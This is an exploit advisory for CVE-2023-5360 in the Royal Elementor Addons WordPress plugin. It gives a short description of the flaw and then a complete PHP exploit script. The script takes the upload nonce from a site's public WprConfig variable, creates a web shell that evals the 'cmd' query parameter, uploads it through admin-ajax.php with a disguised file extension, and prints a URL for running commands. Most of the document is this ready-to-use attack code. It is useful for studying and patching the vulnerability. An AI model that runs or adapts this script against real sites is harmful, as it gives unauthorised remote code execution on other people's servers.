=============================================================================================================================================
| # Title : WordPress Royal Elementor Addons 1.3.78 RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190313/ & CVE-2023-5360
[+] Summary
This advisory describes a security weakness in the Royal Elementor
Addons plugin for WordPress, related to improper validation of file
upload requests and the exposure of a client-side nonce in the global
JavaScript variable "WprConfig".
The plugin registers an AJAX action used for uploading files associated
with various UI elements. The weakness lies in:
1. Exposure of a file upload nonce inside the website’s HTML, accessible
without authentication.
2. Incomplete server-side validation of file type and file origin.
3. Lack of authentication around the upload endpoint, which allows
unauthorized requests to reach the handler.
Theoretical attack sequence (documented for awareness):
- Step 1: Attacker retrieves page HTML.
- Step 2: Extracts nonce from `var WprConfig = {...}`.
- Step 3: Sends crafted POST request to admin-ajax.php.
- Step 4: Server incorrectly processes upload without capability checks.
[+] poc :
usage : php poc.php http://target/ [shell_file]
<?php
/* ========================================================================
Royal Elementor Addons <= 1.3.78 – Full RCE Chain (PHP Version)
Compatible: Windows / Linux / macOS
Requirements: the cURL extension only (allowed in your environment)
No disabled / forbidden functions are used
=========================================================================*/
/* ----------------------------------------------------------------------
SAFE HTTP GET (CURL)
------------------------------------------------------------------------*/
/**
 * Fetch a URL with cURL and hand back the raw response body.
 *
 * Redirects are followed and the whole transfer is abandoned after
 * 10 seconds. Peer-certificate and hostname verification are switched
 * off, so on a hostile network the body cannot be assumed to come from
 * the host named in $url.
 *
 * @param string $url Absolute URL to request.
 * @return string|false Response body, or false when cURL reports a failure.
 */
function safe_http_get($url) {
    $handle = curl_init();
    curl_setopt($handle, CURLOPT_URL, $url);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
    // TLS verification intentionally disabled by the author (self-signed
    // lab targets); this also removes any protection against MITM.
    curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($handle, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($handle, CURLOPT_TIMEOUT, 10);

    $body = curl_exec($handle);
    curl_close($handle);

    return $body;
}
/* ----------------------------------------------------------------------
Extract nonce from: var WprConfig = {...};
------------------------------------------------------------------------*/
/**
 * Pull the "nonce" member out of the page's inline `var WprConfig = {...};`.
 *
 * @param string $target URL of the page to fetch.
 * @return mixed|null The decoded "nonce" value, or null when the page could
 *                    not be fetched, the variable is absent, or the captured
 *                    text does not decode as JSON.
 */
function get_nonce_from_target($target) {
    $html = safe_http_get($target);
    if (!$html) {
        return null;
    }

    // Non-greedy: the capture ends at the first "};" after the opening
    // brace, so an object that itself contains "};" would be truncated.
    $pattern = '/var\s+WprConfig\s*=\s*({.*?});/s';
    if (!preg_match($pattern, $html, $captured)) {
        return null;
    }

    // The captured text is assumed to be strict JSON; a JS literal with
    // unquoted keys decodes to null, which is reported as "no nonce".
    $config = json_decode($captured[1], true);

    return $config["nonce"] ?? null;
}
/* ----------------------------------------------------------------------
Generate Safe Default RCE Shell (Temp File)
------------------------------------------------------------------------*/
// Write the default payload to a uniquely named .php file in the system
// temp directory and return its path. Nothing deletes this file later, so
// it remains on the operator's own disk after the run.
// The payload evaluates the raw "cmd" query parameter; any party able to
// reach the uploaded copy can run code on the host, which is precisely the
// impact a correct server-side upload check is meant to prevent.
function generate_indoushka_shell() {
$path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "indoushka_shell_" . uniqid() . ".php";
$payload = '<?php echo "Indoushka RCE - ";';
$payload .= 'if(isset($_GET["cmd"])) { @eval($_GET["cmd"]); } ?>';
// Return value of file_put_contents (false on failure) is not checked;
// a write error would surface only as a failed upload later.
file_put_contents($path, $payload);
return $path;
}
/* ----------------------------------------------------------------------
Upload PHP File using AJAX (ph_p mutated extension)
------------------------------------------------------------------------*/
// POST a multipart upload to admin-ajax.php and return the URL the handler
// reports for the stored file, or null when the request fails or the
// response carries no data.url member.
// Note: unlike safe_http_get() no CURLOPT_TIMEOUT is set here, so an
// unresponsive host can hang this call indefinitely.
function indoushka_upload_shell($target, $nonce, $file_path) {
$ajax = rtrim($target, "/") . "/wp-admin/admin-ajax.php";
$fields = [
"action" => "wpr_addons_indoushka_file",
"max_file_size" => 0,
// The allowed-extension list is supplied by the client; whether the
// handler trusts this value instead of its own list is the weakness
// being tested (see "Incomplete server-side validation" above).
"allowed_file_types" => "ph_p",
"triggering_event" => "click",
// Nonce read from the public page; it is the only token the handler
// asks for, so it does not prove the caller is logged in.
"wpr_addons_nonce" => $nonce
];
$file = [
"indoushkaed_file" => curl_file_create(
$file_path,
"application/octet-stream",
"rce_mutated.ph_p"
)
];
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $ajax,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array_merge($fields, $file),
CURLOPT_RETURNTRANSFER => true,
// TLS verification disabled, as in safe_http_get().
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
]);
$resp = curl_exec($ch);
curl_close($ch);
// curl_exec() returns false on transport failure; json_decode() of that
// yields null and the function falls through to null below.
$json = json_decode($resp, true);
return $json["data"]["url"] ?? null;
}
/* ----------------------------------------------------------------------
MAIN EXECUTION
------------------------------------------------------------------------*/
/* Entry point: argv[1] is the site base URL, optional argv[2] a local file to
   upload instead of the generated one. Every failure path below uses a bare
   exit (status 0), so a calling script cannot tell success from failure by
   exit code alone. */
if ($argc < 2) {
echo "Usage:\n php " . $argv[0] . " http://target.com/ [shell.php]\n";
exit;
}
$target = $argv[1];
$custom_shell = $argv[2] ?? null;
echo "=== Royal Elementor Addons Full RCE PoC ===\n";
echo "[*] Extracting nonce from homepage...\n";
$nonce = get_nonce_from_target($target);
// A missing nonce can also mean the page did not load or WprConfig is not
// strict JSON, not only that the target is patched.
if (!$nonce) {
echo "[-] Failed to extract nonce. Target may be patched.\n";
exit;
}
echo "[+] Nonce found: $nonce\n";
/* Shell Selection */
if ($custom_shell) {
echo "[*] Using provided shell: $custom_shell\n";
// Path is handed straight to curl_file_create(); existence is not checked.
$shell = $custom_shell;
} else {
echo "[*] Generating default Indoushka RCE shell...\n";
$shell = generate_indoushka_shell();
echo "[+] Shell saved at: $shell\n";
}
echo "[*] Uploading shell via vulnerable AJAX handler...\n";
$url = indoushka_upload_shell($target, $nonce, $shell);
if ($url) {
echo "[+] Shell uploaded successfully!\n";
echo "[+] URL: $url\n";
echo "[>] Test: {$url}?cmd=system('id');\n";
} else {
echo "[-] Upload failed. Target may be protected or patched.\n";
}
// Informational only: a base64 of the current timestamp; it is not sent
// anywhere and has no effect on the run.
echo "Payload Variant: " . base64_encode("ALT-FINAL-" . microtime(true)) . "\n";
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================